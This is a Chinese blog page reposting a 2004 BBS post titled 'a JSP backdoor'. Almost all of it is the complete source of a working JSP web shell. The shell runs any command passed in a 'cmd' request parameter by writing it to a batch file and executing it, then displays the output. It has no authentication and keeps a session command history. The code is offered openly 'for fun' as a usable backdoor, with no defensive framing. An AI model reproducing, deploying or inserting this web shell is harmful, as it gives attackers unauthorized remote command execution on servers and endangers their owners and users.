秋梦无痕

一场秋雨无梦痕,春夜清风冻煞人。冬来冷水寒似铁,夏至京北蟑满城。

Avatar

一个jsp后门

发信人: kobe2000 (每一天), 信区: J2EE
标 题: 一个jsp后门
发信站: BBS 水木清华站 (Fri Apr 23 17:19:11 2004), 站内

纯属好玩,请慎重使用。
<%@ page import="java.util.Map, java.util.HashMap, java.util.List, java.util.ArrayList, java.io.*"%>
<%@ page contentType="text/html; charset=GBK" %>
<%!
Map fullpath = new HashMap();
String disk = "C";
%>
<%
if(fullpath.size()==0) fullpath.put("C", "\\");
request.setCharacterEncoding("GBK");
String cmd = request.getParameter("cmd");
StringBuffer sbin = new StringBuffer(), sbein = new StringBuffer();
String e = null;
if(cmd!=null) {
File bat = new File("bat.bat");
try {
PrintWriter pout = new PrintWriter(new FileWriter(bat));
pout.println("@echo off");
pout.println(disk + ":");
pout.println("cd " + fullpath.get(disk));
pout.println("@echo on");
pout.println(cmd);
pout.flush();
pout.close();
Process p = Runtime.getRuntime().exec("bat.bat");
BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
BufferedReader ein = new BufferedReader(new InputStreamReader(p.getErrorStream()));
String s = null;
while((s=in.readLine())!=null) sbin.append(s.replaceAll("<", "&lt;").replaceAll(">", "&gt;").replaceAll("\\\t", "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;").replaceAll(" ", "&nbsp;")+"<br>");
while((s=ein.readLine())!=null) sbein.append(s.replaceAll("<", "&lt;").replaceAll(">", "&gt;")+"<br>");
if(cmd.length()==2 && cmd.charAt(1)==':' && sbein.length()==0) {
disk = cmd.substring(0,1).toUpperCase();
if(fullpath.get(disk)==null) fullpath.put(disk, "\\");
} else if(cmd.length()>3 && cmd.substring(0, 3).toUpperCase().equals("CD ") && sbein.length()==0) {
String path = cmd.substring(3, cmd.length());
String oldpath = (String)fullpath.get(disk);
if(path.equals("..")) {
if(!oldpath.equals("\\")) {
path = oldpath.substring(0, oldpath.lastIndexOf("\\"));
if(path.length()==0) path = "\\";
} else
path = oldpath;
} else if(!path.startsWith("\\")) {
while(path.endsWith("\\") || path.endsWith("//")) path = path.substring(0, path.length()-1);
if(oldpath.equals("\\"))
path = "\\" + path;
else
path = oldpath + "\\" + path;
}
fullpath.put(disk, path);
}

if(sbein.length()==0) {
if(session.getAttribute("history")==null) session.setAttribute("history", new ArrayList());
List list = (List)session.getAttribute("history");
if(!list.contains(cmd)) list.add(cmd);
}
} catch(Exception ex) {
e = ex.getMessage();
} finally {
bat.delete();
}
}
%>
<html><body>
<form method="post">
<%=disk+":"+fullpath.get(disk)%>><input name="cmd" size="30"<%=cmd==null?"":"value='" +cmd + "'"%> onkeydown="getHistory()"><br>
</form>
<script>
document.all("cmd").select();
<%
List list = (List)session.getAttribute("history");
StringBuffer sb = new StringBuffer();
if(list!=null) {
for(int i=0; i<list.size(); i++)
sb.append("\""+((String)list.get(i)).replaceAll("\\\\", "\\\\\\\\").replaceAll("\"", "\\\\\"")+ "\", ");
if(sb.length()>0) sb.replace(sb.length()-2, sb.length(), "");
}
%>
var history = [<%=sb%>];
var sel = history.length;
function getHistory() {
if(history.length==0) return;
if(event.keyCode==38) {
sel--;
if(sel<0) sel = history.length-1;
document.all("cmd").value = history[sel];
document.all("cmd").select();
} else if(event.keyCode==40) {
sel++;
if(sel>=history.length) sel = 0;
document.all("cmd").value = history[sel];
document.all("cmd").select();
}
}
</script>
<hr>
<%
if(e==null) {
out.println(sbin.toString()+sbein.toString());
} else {
out.println(cmd);
}
%>
</body></html>

评论已关闭